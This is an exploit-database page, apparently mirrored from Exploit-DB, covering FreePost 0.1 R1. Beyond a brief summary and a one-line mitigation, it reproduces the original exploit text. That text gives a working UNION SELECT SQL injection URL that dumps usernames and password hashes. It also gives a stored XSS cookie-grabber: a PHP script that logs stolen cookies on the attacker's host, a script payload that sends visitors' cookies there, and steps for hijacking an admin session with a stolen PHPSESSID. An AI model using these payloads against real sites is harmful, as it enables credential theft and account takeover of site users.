header-logo
Suggest Exploit
vendor:
FreePost
by:
ThE g0bL!N
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: FreePost
Affected Version From: 0.1 R1
Affected Version To: 0.1 R1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2012

Exploit FreePost 0.1 R1 SQL Injection

FreePost 0.1 R1 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. The attacker can also inject malicious code into the database and execute it. The exploit involves sending a crafted SQL query to the vulnerable application. The query contains a UNION SELECT statement that allows the attacker to extract data from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

#####################################################################################################
# Exploit FreePost 0.1 R1 SQL Injection
# Date: June 6nd 2012
# Author: ThE g0bL!N
# Version: 0.1 R1
# Vendor Url: http://www.phpbrasil.com/script/dYRoLbwWu_zR/freepost-01-r1
# Tested on: Xp Service Pack 2
#####################################################################################################
#  Greets To : Lider Pirata  , Yassine Tablouche , Ilyes , Bilal ,
Habib,  Djamal  , Boukhors .. etc
#####################################################################################################

Exploit:
--------
 1) You Need To register
 2) http://localhost/freepost0.1-R1/edit.php?action=edit&post=1 [SQL CODE]
 3) /edit.php?action=edit&post=-1+union+select+1,2,3,concat(user_login,0x3a,user_pass),5,6,7+from+b2users--


#################################################################################################################
[+] FreePost 0.1 R1 Cookie Grabber Exploit
[+] Discovered By ThE g0bL!N
[+] Greets To : Lider Pirata , Yassine Tablouche , Ilyes , Bilal ,
Habib, Djamal , Boukhors .. etc
[+] Vendor:http://www.phpbrasil.com/script/dYRoLbwWu_zR/freepost-01-r1
#################################################################################################################
PoC
--
[+] Make 2 files and upload to your host :
[+]cookie.php - > Put in this File That Code:
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
[+]log.txt - > CHMOD it 777 and put in the same directory with cookie.php

[+]Exploit:
-------
1)First Register in the site
2) go to http://site.com/edit.php
3) add This Code :<script>document.location
="http://localhost/[path]/cookie.php?cookie=" +
document.cookie;</script>
4) any one open this page engenie.php you gonna still his cookies

Example
-------
Result:
------
PHPSESSID:aafaa0f2cad7431d5cec1431e5bafb03
Then we put that code
javascript:document.cookie="PHPSESSID=aafaa0f2cad7431d5cec1431e5bafb03;path=/";
After That you see :
Hello Admin :)
################################################################################################################

Navigation

Suggest Exploit

Services By CQR